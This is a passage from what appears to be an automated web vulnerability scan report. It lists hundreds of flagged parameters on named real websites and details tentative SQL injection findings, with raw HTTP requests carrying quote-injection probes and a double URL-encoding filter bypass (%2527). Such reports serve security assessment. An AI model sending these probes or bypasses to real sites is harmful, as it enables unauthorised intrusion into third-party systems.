4.34. http://gmtrx.com/tracking202/static/landing.php [name of an arbitrarily supplied request parameter]

4.35. http://http300.edge.ru4.com/smartserve/ad [VS_cookie parameter]

4.36. http://http300.edge.ru4.com/smartserve/ad [VS_cookie parameter]

4.37. http://http300.edge.ru4.com/smartserve/ad [cg5 parameter]

4.38. http://http300.edge.ru4.com/smartserve/ad [cg5 parameter]

4.39. http://http300.edge.ru4.com/smartserve/ad [customer_indicator parameter]

4.40. http://http300.edge.ru4.com/smartserve/ad [customer_indicator parameter]

4.41. http://http300.edge.ru4.com/smartserve/ad [paidornatural parameter]

4.42. http://http300.edge.ru4.com/smartserve/ad [referrer parameter]

4.43. http://http300.edge.ru4.com/smartserve/ad [referrer parameter]

4.44. http://http300.edge.ru4.com/smartserve/ad [searchterm parameter]

4.45. http://its.ucsc.edu/terms/google_analytics.php [name of an arbitrarily supplied request parameter]

4.46. http://its.ucsc.edu/terms/google_analytics.php [name of an arbitrarily supplied request parameter]

4.47. http://js.revsci.net/gateway/gw.js [csid parameter]

4.48. http://m.mercurynews.com/sjm/db_101028/contentdetail.htm [name of an arbitrarily supplied request parameter]

4.49. http://m.mercurynews.com/sjm/db_101028_index.htm [name of an arbitrarily supplied request parameter]

4.50. http://m.mercurynews.com/sjm/db_101030/contentdetail.htm [name of an arbitrarily supplied request parameter]

4.51. http://m.mercurynews.com/sjm/db_101032_index.htm [name of an arbitrarily supplied request parameter]

4.52. http://m.mercurynews.com/sjm/db_101036/contentdetail.htm [name of an arbitrarily supplied request parameter]

4.53. http://m.mercurynews.com/sjm/db_101036_index.htm [name of an arbitrarily supplied request parameter]

4.54. http://m.mercurynews.com/sjm/db_101038/contentdetail.htm [name of an arbitrarily supplied request parameter]

4.55. http://m.mercurynews.com/sjm/db_101041/contentdetail.htm [name of an arbitrarily supplied request parameter]

4.56. http://m.mercurynews.com/sjm/db_101041_index.htm [name of an arbitrarily supplied request parameter]

4.57. http://m.mercurynews.com/sjm/db_101043/contentdetail.htm [name of an arbitrarily supplied request parameter]

4.58. http://m.mercurynews.com/sjm/db_101043_index.htm [name of an arbitrarily supplied request parameter]

4.59. http://m.mercurynews.com/sjm/db_101049/contentdetail.htm [name of an arbitrarily supplied request parameter]

4.60. http://m.mercurynews.com/sjm/db_101049_index.htm [name of an arbitrarily supplied request parameter]

4.61. http://m.mercurynews.com/sjm/db_101051/contentdetail.htm [name of an arbitrarily supplied request parameter]

4.62. http://m.mercurynews.com/sjm/db_101051_index.htm [name of an arbitrarily supplied request parameter]

4.63. http://m.mercurynews.com/sjm/db_12120_index.htm [name of an arbitrarily supplied request parameter]

4.64. http://m.mercurynews.com/sjm/index.htm [name of an arbitrarily supplied request parameter]

4.65. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [lang parameter]

4.66. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [logo parameter]

4.67. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [metric parameter]

4.68. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [partner parameter]

4.69. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [tStyle parameter]

4.70. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [target parameter]

4.71. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [theme parameter]

4.72. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [zipcode parameter]

4.73. http://news1reports.com/default-js.asp [funnelid parameter]

4.74. http://news1reports.com/default-js.asp [funnelid parameter]

4.75. http://newspaperads.mercurynews.com/FSI/AllPages.aspx [version parameter]

4.76. http://newspaperads.mercurynews.com/FSI/Brands.aspx [version parameter]

4.77. http://newspaperads.mercurynews.com/FSI/Page.aspx [version parameter]

4.78. http://newspaperads.mercurynews.com/shared/EmailAFriend.aspx [refer parameter]

4.79. https://rtn.fididel.com/script.js [button parameter]

4.80. http://sanfrancisco.giants.mlb.com/index.jsp [c_id parameter]

4.81. http://sanfrancisco.giants.mlb.com/index.jsp [name of an arbitrarily supplied request parameter]

4.82. http://search.haas.berkeley.edu/search [q parameter]

4.83. https://secure.www.mercurynews.com/portlet/registration/html/info.jsp [rFreeForm parameter]

4.84. https://secure.www.mercurynews.com/registration [rPage parameter]

4.85. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

4.86. http://tipd.com/ [name of an arbitrarily supplied request parameter]

4.87. http://redcated/INV/iview/255848431/direct/01 [name of an arbitrarily supplied request parameter]

4.88. http://redcated/NYC/iview/262034928/direct/01 [REST URL parameter 4]

4.89. http://redcated/NYC/iview/262034928/direct/01 [click parameter]

4.90. http://redcated/NYC/iview/262034928/direct/01 [click parameter]

4.91. http://redcated/NYC/iview/262034928/direct/01 [click parameter]

4.92. http://redcated/NYC/iview/262034928/direct/01 [name of an arbitrarily supplied request parameter]

4.93. http://redcated/NYC/iview/262034928/direct/01 [name of an arbitrarily supplied request parameter]

4.94. http://redcated/NYC/iview/262034928/direct/01 [name of an arbitrarily supplied request parameter]

4.95. http://redcated/NYC/iview/262034929/direct/01 [REST URL parameter 4]

4.96. http://redcated/NYC/iview/262034929/direct/01 [click parameter]

4.97. http://redcated/NYC/iview/262034929/direct/01 [click parameter]

4.98. http://redcated/NYC/iview/262034929/direct/01 [click parameter]

4.99. http://redcated/NYC/iview/262034929/direct/01 [name of an arbitrarily supplied request parameter]

4.100. http://redcated/NYC/iview/262034929/direct/01 [name of an arbitrarily supplied request parameter]

4.101. http://redcated/NYC/iview/262034929/direct/01 [name of an arbitrarily supplied request parameter]

4.102. http://weekly-consumer-tips.com/ [&t202id parameter]

4.103. http://weekly-consumer-tips.com/ [c3 parameter]

4.104. http://weekly-consumer-tips.com/ [t202kw parameter]

4.105. http://www.addthis.com/bookmark.php [REST URL parameter 1]

4.106. http://www.addthis.com/bookmark.php [REST URL parameter 1]

4.107. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

4.108. http://www.azcentral.com/members/Blog/JimGintonio [REST URL parameter 2]

4.109. http://www.capitalone.com/directbanking/interest-online-checking-account/index.php [linkid parameter]

4.110. http://www.capitalone.com/directbanking/interest-online-checking-account/index.php [name of an arbitrarily supplied request parameter]

4.111. http://www.capitalone.com/directbanking/interest-online-checking-account/index.php [name of an arbitrarily supplied request parameter]

4.112. http://www.capitalone.com/directbanking/rewards-online-checking-account/index.php [linkid parameter]

4.113. http://www.capitalone.com/directbanking/rewards-online-checking-account/index.php [name of an arbitrarily supplied request parameter]

4.114. http://www.capitalone.com/directbanking/rewards-online-checking-account/index.php [name of an arbitrarily supplied request parameter]

4.115. http://www.care2.com/news/ [name of an arbitrarily supplied request parameter]

4.116. http://www.carpricesecrets.com/mercury [REST URL parameter 1]

4.117. http://www.carpricesecrets.com/mercury [t_se parameter]

4.118. http://www.carpricesecrets.com/page_footer_frame.php [REST URL parameter 1]

4.119. http://www.carpricesecrets.com/page_footer_frame.php [body parameter]

4.120. http://www.carpricesecrets.com/page_footer_frame.php [make parameter]

4.121. http://www.carpricesecrets.com/page_footer_frame.php [model parameter]

4.122. http://www.carpricesecrets.com/page_footer_frame.php [zip parameter]

4.123. http://www.carpricesecrets.com/page_footer_frame.php [zip parameter]

4.124. http://www.chefuniforms.com/ [name of an arbitrarily supplied request parameter]

4.125. http://www.contracostatimes.com/mngi/tracking/track [c parameter]

4.126. http://www.contracostatimes.com/mngi/tracking/track [n parameter]

4.127. http://www.contracostatimes.com/mngi/tracking/track [s parameter]

4.128. http://www.contracostatimes.com/mngi/tracking/track [t parameter]

4.129. http://www.contracostatimes.com/portlet/article/html/render_gallery.jsp [startImage parameter]

4.130. http://www.csnbayarea.com/11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html [REST URL parameter 1]

4.131. http://www.csnbayarea.com/11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html [REST URL parameter 2]

4.132. http://www.csnbayarea.com/11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html [REST URL parameter 3]

4.133. http://www.csnbayarea.com/11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html [REST URL parameter 4]

4.134. http://www.csnbayarea.com/11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html [feedID parameter]

4.135. http://www.csnbayarea.com/11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html [name of an arbitrarily supplied request parameter]

4.136. http://www.fremonttoyota.com/Toyota-Dealer/Cupertino/About%20Us/ [REST URL parameter 2]

4.137. http://www.fremonttoyota.com/Toyota-Dealer/Cupertino/About%20Us/ [REST URL parameter 2]

4.138. http://www.fremonttoyota.com/Toyota-Dealer/Cupertino/About%20Us/ [REST URL parameter 2]

4.139. http://www.fremonttoyota.com/Toyota-Dealer/Cupertino/About%20Us/ [REST URL parameter 3]

4.140. http://www.fremonttoyota.com/Toyota-Dealer/Fremont/About%20Us/ [REST URL parameter 3]

4.141. http://www.fremonttoyota.com/Toyota-Dealer/Milpitas/About%20Us/ [REST URL parameter 3]

4.142. http://www.fremonttoyota.com/Toyota-Dealer/San%20Leandro/About%20Us/ [REST URL parameter 2]

4.143. http://www.fremonttoyota.com/Toyota-Dealer/San%20Leandro/About%20Us/ [REST URL parameter 2]

4.144. http://www.fremonttoyota.com/Toyota-Dealer/San%20Leandro/About%20Us/ [REST URL parameter 2]

4.145. http://www.fremonttoyota.com/Toyota-Dealer/San%20Leandro/About%20Us/ [REST URL parameter 3]

4.146. http://www.fremonttoyota.com/Toyota-Dealer/San%20Mateo/About%20Us/ [REST URL parameter 2]

4.147. http://www.fremonttoyota.com/Toyota-Dealer/San%20Mateo/About%20Us/ [REST URL parameter 2]

4.148. http://www.fremonttoyota.com/Toyota-Dealer/San%20Mateo/About%20Us/ [REST URL parameter 2]

4.149. http://www.fremonttoyota.com/Toyota-Dealer/San%20Mateo/About%20Us/ [REST URL parameter 3]

4.150. http://www.fremonttoyota.com/Toyota/4Runner/ [REST URL parameter 2]

4.151. http://www.fremonttoyota.com/Toyota/4Runner/ [REST URL parameter 2]

4.152. http://www.fremonttoyota.com/Toyota/4Runner/ [REST URL parameter 2]

4.153. http://www.fremonttoyota.com/Toyota/Avalon/ [REST URL parameter 2]

4.154. http://www.fremonttoyota.com/Toyota/Avalon/ [REST URL parameter 2]

4.155. http://www.fremonttoyota.com/Toyota/Avalon/ [REST URL parameter 2]

4.156. http://www.fremonttoyota.com/Toyota/Camry%20Hybrid/ [REST URL parameter 2]

4.157. http://www.fremonttoyota.com/Toyota/Camry%20Hybrid/ [REST URL parameter 2]

4.158. http://www.fremonttoyota.com/Toyota/Camry%20Hybrid/ [REST URL parameter 2]

4.159. http://www.fremonttoyota.com/Toyota/Camry/ [REST URL parameter 2]

4.160. http://www.fremonttoyota.com/Toyota/Camry/ [REST URL parameter 2]

4.161. http://www.fremonttoyota.com/Toyota/Camry/ [REST URL parameter 2]

4.162. http://www.fremonttoyota.com/Toyota/Corolla/ [REST URL parameter 2]

4.163. http://www.fremonttoyota.com/Toyota/Corolla/ [REST URL parameter 2]

4.164. http://www.fremonttoyota.com/Toyota/Corolla/ [REST URL parameter 2]

4.165. http://www.fremonttoyota.com/Toyota/FJ%20Cruiser%204x2/ [REST URL parameter 2]

4.166. http://www.fremonttoyota.com/Toyota/FJ%20Cruiser%204x2/ [REST URL parameter 2]

4.167. http://www.fremonttoyota.com/Toyota/FJ%20Cruiser%204x2/ [REST URL parameter 2]

4.168. http://www.fremonttoyota.com/Toyota/FJ%20Cruiser%204x4/ [REST URL parameter 2]

4.169. http://www.fremonttoyota.com/Toyota/FJ%20Cruiser%204x4/ [REST URL parameter 2]

4.170. http://www.fremonttoyota.com/Toyota/FJ%20Cruiser%204x4/ [REST URL parameter 2]

4.171. http://www.fremonttoyota.com/Toyota/Highlander%20Hybrid/ [REST URL parameter 2]

4.172. http://www.fremonttoyota.com/Toyota/Highlander%20Hybrid/ [REST URL parameter 2]

4.173. http://www.fremonttoyota.com/Toyota/Highlander%20Hybrid/ [REST URL parameter 2]

4.174. http://www.fremonttoyota.com/Toyota/Highlander/ [REST URL parameter 2]

4.175. http://www.fremonttoyota.com/Toyota/Highlander/ [REST URL parameter 2]

4.176. http://www.fremonttoyota.com/Toyota/Highlander/ [REST URL parameter 2]

4.177. http://www.fremonttoyota.com/Toyota/Land%20Cruiser/ [REST URL parameter 2]

4.178. http://www.fremonttoyota.com/Toyota/Land%20Cruiser/ [REST URL parameter 2]

4.179. http://www.fremonttoyota.com/Toyota/Land%20Cruiser/ [REST URL parameter 2]

4.180. http://www.fremonttoyota.com/Toyota/Matrix/ [REST URL parameter 2]

4.181. http://www.fremonttoyota.com/Toyota/Matrix/ [REST URL parameter 2]

4.182. http://www.fremonttoyota.com/Toyota/Matrix/ [REST URL parameter 2]

4.183. http://www.fremonttoyota.com/Toyota/Prius/ [REST URL parameter 2]

4.184. http://www.fremonttoyota.com/Toyota/Prius/ [REST URL parameter 2]

4.185. http://www.fremonttoyota.com/Toyota/Prius/ [REST URL parameter 2]

4.186. http://www.fremonttoyota.com/Toyota/RAV4/ [REST URL parameter 2]

4.187. http://www.fremonttoyota.com/Toyota/RAV4/ [REST URL parameter 2]

4.188. http://www.fremonttoyota.com/Toyota/RAV4/ [REST URL parameter 2]

4.189. http://www.fremonttoyota.com/Toyota/Sequoia/ [REST URL parameter 2]

4.190. http://www.fremonttoyota.com/Toyota/Sequoia/ [REST URL parameter 2]

4.191. http://www.fremonttoyota.com/Toyota/Sequoia/ [REST URL parameter 2]

4.192. http://www.fremonttoyota.com/Toyota/Sienna/ [REST URL parameter 2]

4.193. http://www.fremonttoyota.com/Toyota/Sienna/ [REST URL parameter 2]

4.194. http://www.fremonttoyota.com/Toyota/Sienna/ [REST URL parameter 2]

4.195. http://www.fremonttoyota.com/Toyota/Tacoma%204x2/ [REST URL parameter 2]

4.196. http://www.fremonttoyota.com/Toyota/Tacoma%204x2/ [REST URL parameter 2]

4.197. http://www.fremonttoyota.com/Toyota/Tacoma%204x2/ [REST URL parameter 2]

4.198. http://www.fremonttoyota.com/Toyota/Tacoma%204x4/ [REST URL parameter 2]

4.199. http://www.fremonttoyota.com/Toyota/Tacoma%204x4/ [REST URL parameter 2]

4.200. http://www.fremonttoyota.com/Toyota/Tacoma%204x4/ [REST URL parameter 2]

4.201. http://www.fremonttoyota.com/Toyota/Tacoma%20PreRunner/ [REST URL parameter 2]

4.202. http://www.fremonttoyota.com/Toyota/Tacoma%20PreRunner/ [REST URL parameter 2]

4.203. http://www.fremonttoyota.com/Toyota/Tacoma%20PreRunner/ [REST URL parameter 2]

4.204. http://www.fremonttoyota.com/Toyota/Tundra%20Crew%20Max%204x2/ [REST URL parameter 2]

4.205. http://www.fremonttoyota.com/Toyota/Tundra%20Crew%20Max%204x2/ [REST URL parameter 2]

4.206. http://www.fremonttoyota.com/Toyota/Tundra%20Crew%20Max%204x2/ [REST URL parameter 2]

4.207. http://www.fremonttoyota.com/Toyota/Tundra%20Crew%20Max%204x4/ [REST URL parameter 2]

4.208. http://www.fremonttoyota.com/Toyota/Tundra%20Crew%20Max%204x4/ [REST URL parameter 2]

4.209. http://www.fremonttoyota.com/Toyota/Tundra%20Crew%20Max%204x4/ [REST URL parameter 2]

4.210. http://www.fremonttoyota.com/Toyota/Tundra%20Double%20Cab%204x2/ [REST URL parameter 2]

4.211. http://www.fremonttoyota.com/Toyota/Tundra%20Double%20Cab%204x2/ [REST URL parameter 2]

4.212. http://www.fremonttoyota.com/Toyota/Tundra%20Double%20Cab%204x2/ [REST URL parameter 2]

4.213. http://www.fremonttoyota.com/Toyota/Tundra%20Double%20Cab%204x4/ [REST URL parameter 2]

4.214. http://www.fremonttoyota.com/Toyota/Tundra%20Double%20Cab%204x4/ [REST URL parameter 2]

4.215. http://www.fremonttoyota.com/Toyota/Tundra%20Double%20Cab%204x4/ [REST URL parameter 2]

4.216. http://www.fremonttoyota.com/Toyota/Tundra%20Regular%20Cab%204x2/ [REST URL parameter 2]

4.217. http://www.fremonttoyota.com/Toyota/Tundra%20Regular%20Cab%204x2/ [REST URL parameter 2]

4.218. http://www.fremonttoyota.com/Toyota/Tundra%20Regular%20Cab%204x2/ [REST URL parameter 2]

4.219. http://www.fremonttoyota.com/Toyota/Tundra%20Regular%20Cab%204x4/ [REST URL parameter 2]

4.220. http://www.fremonttoyota.com/Toyota/Tundra%20Regular%20Cab%204x4/ [REST URL parameter 2]

4.221. http://www.fremonttoyota.com/Toyota/Tundra%20Regular%20Cab%204x4/ [REST URL parameter 2]

4.222. http://www.fremonttoyota.com/Toyota/Venza/ [REST URL parameter 2]

4.223. http://www.fremonttoyota.com/Toyota/Venza/ [REST URL parameter 2]

4.224. http://www.fremonttoyota.com/Toyota/Venza/ [REST URL parameter 2]

4.225. http://www.fremonttoyota.com/Toyota/Yaris/ [REST URL parameter 2]

4.226. http://www.fremonttoyota.com/Toyota/Yaris/ [REST URL parameter 2]

4.227. http://www.fremonttoyota.com/Toyota/Yaris/ [REST URL parameter 2]

4.228. http://www.fremonttoyota.com/carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyota/ [REST URL parameter 3]

4.229. http://www.fremonttoyota.com/carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyota/ [REST URL parameter 4]

4.230. http://www.fremonttoyota.com/carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyota/ [REST URL parameter 4]

4.231. http://www.fremonttoyota.com/carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyota/ [REST URL parameter 4]

4.232. http://www.fremonttoyota.com/carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyota/ [REST URL parameter 4]

4.233. http://www.fremonttoyota.com/carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyota/ [REST URL parameter 4]

4.234. http://www.fremonttoyota.com/inventory.php [&VehicleType parameter]

4.235. http://www.fremonttoyota.com/inventory.php [&VehicleType parameter]

4.236. http://www.fremonttoyota.com/inventory.php [&VehicleType parameter]

4.237. http://www.fremonttoyota.com/inventory.php [Model parameter]

4.238. http://www.fremonttoyota.com/inventory.php [Model parameter]

4.239. http://www.fremonttoyota.com/inventory.php [Model parameter]

4.240. http://www.fremonttoyota.com/inventory.php [VehicleType parameter]

4.241. http://www.fremonttoyota.com/inventory.php [VehicleType parameter]

4.242. http://www.fremonttoyota.com/inventory.php [VehicleType parameter]

4.243. http://www.fremonttoyota.com/inventory.php [name of an arbitrarily supplied request parameter]

4.244. http://www.fremonttoyota.com/inventory.php [name of an arbitrarily supplied request parameter]

4.245. http://www.fremonttoyota.com/inventory.php [name of an arbitrarily supplied request parameter]

4.246. http://www.fremonttoyota.com/quick-quote.html [model parameter]

4.247. http://www.fremonttoyota.com/search/CPO+t [REST URL parameter 2]

4.248. http://www.fremonttoyota.com/search/New+2011+Toyota+Avalon+tymM [REST URL parameter 2]

4.249. http://www.fremonttoyota.com/search/New+2011+Toyota+Sienna+tymM [REST URL parameter 2]

4.250. http://www.fremonttoyota.com/search/New+Toyota+tm [REST URL parameter 2]

4.251. http://www.fremonttoyota.com/search/Used+Toyota+tm [REST URL parameter 2]

4.252. http://www.fremonttoyota.com/search/Used+t [REST URL parameter 2]

4.253. http://www.gotdailydeals.com/contact [REST URL parameter 1]

4.254. http://www.gotdailydeals.com/eb [REST URL parameter 1]

4.255. http://www.gotdailydeals.com/facebook-login [REST URL parameter 1]

4.256. http://www.gotdailydeals.com/forgot-password [REST URL parameter 1]

4.257. http://www.gotdailydeals.com/j_spring_security_check [REST URL parameter 1]

4.258. http://www.gotdailydeals.com/privacy [REST URL parameter 1]

4.259. http://www.gotdailydeals.com/r [REST URL parameter 1]

4.260. http://www.gotdailydeals.com/sb [REST URL parameter 1]

4.261. http://www.gotdailydeals.com/sb/ [REST URL parameter 1]

4.262. http://www.gotdailydeals.com/subscribe [REST URL parameter 1]

4.263. http://www.gotdailydeals.com/tou [REST URL parameter 1]

4.264. http://www.gotdailydeals.com/widgets/sbpromo [REST URL parameter 2]

4.265. http://www.kledy.de/ [name of an arbitrarily supplied request parameter]

4.266. http://www.linkedin.com/company/api/recommendation/count [callback parameter]

4.267. https://www.linkedin.com/uas/connect/logout [REST URL parameter 1]

4.268. https://www.linkedin.com/uas/connect/user-signin [REST URL parameter 1]

4.269. https://www.linkedin.com/uas/js/authuserspace [REST URL parameter 1]

4.270. https://www.linkedin.com/uas/js/userspace [REST URL parameter 1]

4.271. https://www.linkedin.com/uas/oauth2/authorize [REST URL parameter 1]

4.272. http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter]

4.273. http://www.netvouz.com/ [name of an arbitrarily supplied request parameter]

4.274. http://www.nj.com/devils/index.ssf/devilsbeatreportersblog/ [name of an arbitrarily supplied request parameter]

4.275. http://www.protopage.com/ [name of an arbitrarily supplied request parameter]

4.276. http://www.shoplocal.com/bayareacom/coupons.aspx [name of an arbitrarily supplied request parameter]

4.277. http://www.shoplocal.com/bayareacom/home.aspx [name of an arbitrarily supplied request parameter]

4.278. http://www.shoplocal.com/bayareacom/topdeals.aspx [name of an arbitrarily supplied request parameter]

4.279. http://www.shoplocal.com/bayareacom/topdealslanding.aspx [name of an arbitrarily supplied request parameter]

4.280. http://www.shoplocal.com/bayareacom/weeklyads.aspx [name of an arbitrarily supplied request parameter]

4.281. http://www.shoplocal.com/san+jose/home.aspx [name of an arbitrarily supplied request parameter]

4.282. http://www.shoplocal.com/searchlocal.aspx [name of an arbitrarily supplied request parameter]

4.283. http://www.shoplocal.com/searchlocal.aspx [searchtext parameter]

4.284. http://www.shoplocal.com/searchlocal.aspx [searchtext parameter]

4.285. https://www.starbucks.com/card [name of an arbitrarily supplied request parameter]

4.286. https://www.starbucks.com/card/rewards/card-rewards-canada [name of an arbitrarily supplied request parameter]

4.287. https://www.starbucks.com/card/rewards/program-information [name of an arbitrarily supplied request parameter]

4.288. https://www.starbucks.com/card/starbucks-gold [name of an arbitrarily supplied request parameter]

4.289. http://www.stltoday.com/blogzone/morning-skate/ [name of an arbitrarily supplied request parameter]

4.290. http://www.ucsc-extension.edu/programs/bioinformatics [name of an arbitrarily supplied request parameter]

4.291. http://www.ucsc-extension.edu/programs/biotechnology [name of an arbitrarily supplied request parameter]

4.292. http://www.ucsc-extension.edu/programs/medical-devices [name of an arbitrarily supplied request parameter]

4.293. http://medienfreunde.com/lab/innerfade/ [Referer HTTP header]

4.294. https://secure.www.mercurynews.com/registration [Referer HTTP header]

4.295. https://secure.www.mercurynews.com/registration [Referer HTTP header]

4.296. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]

4.297. http://www.accuweather.com/index-radar.asp [Referer HTTP header]

4.298. http://www.accuweather.com/maps-satellite.asp [Referer HTTP header]

4.299. http://www.addthis.com/bookmark.php [Referer HTTP header]

4.300. http://www.addthis.com/bookmark.php [Referer HTTP header]

4.301. http://www.arto.com/ [User-Agent HTTP header]

4.302. http://www.protopage.com/ [Referer HTTP header]

4.303. http://ads.yldmgrimg.net/apex/template/swfobject.js [REST URL parameter 1]

4.304. http://ads.yldmgrimg.net/apex/template/swfobject.js [REST URL parameter 2]

4.305. http://ads.yldmgrimg.net/apex/template/swfobject.js [REST URL parameter 3]

4.306. http://optimized-by.rubiconproject.com/a/5833/7750/12853-2.js [ruid cookie]

4.307. http://optimized-by.rubiconproject.com/a/5833/7750/12853-9.js [ruid cookie]

4.308. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

4.309. http://seg.sharethis.com/getSegment.php [__stid cookie]

4.310. http://www.sunnyvalevw.com/ [sId cookie]

4.311. http://www.sunnyvalevw.com/ [visitorId cookie]

4.312. http://www.sunnyvalevw.com/ContactUsForm [sId cookie]

4.313. http://www.sunnyvalevw.com/ContactUsForm [visitorId cookie]

4.314. http://www.sunnyvalevw.com/HomePage [sId cookie]

4.315. http://www.sunnyvalevw.com/HomePage [visitorId cookie]

4.316. http://www.sunnyvalevw.com/HoursAndDirections [sId cookie]

4.317. http://www.sunnyvalevw.com/HoursAndDirections [visitorId cookie]

4.318. http://www.sunnyvalevw.com/PrivacyPolicy [sId cookie]

4.319. http://www.sunnyvalevw.com/PrivacyPolicy [visitorId cookie]

4.320. http://www.sunnyvalevw.com/ServiceEvent_D [sId cookie]

4.321. http://www.sunnyvalevw.com/ServiceEvent_D [visitorId cookie]

4.322. http://www.sunnyvalevw.com/siteMap [sId cookie]

4.323. http://www.sunnyvalevw.com/siteMap [visitorId cookie]



1. SQL injection
There are 290 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://4c28d6.r.axf8.net/mr/a.gif [a parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://4c28d6.r.axf8.net
Path:   /mr/a.gif

Issue detail

The a parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the a parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /mr/a.gif?a=4C28D6'&v=1 HTTP/1.1
Host: 4c28d6.r.axf8.net
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 3028
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 22:57:48 GMT

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /mr/a.gif?a=4C28D6''&v=1 HTTP/1.1
Host: 4c28d6.r.axf8.net
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 22:57:49 GMT


1.2. http://blogs.mercurynews.com/aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blogs.mercurynews.com
Path:   /aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /aei/2010/12%2527/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/ HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:12:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:12:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-
...[SNIP]...

Request 2

GET /aei/2010/12%2527%2527/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/ HTTP/1.1
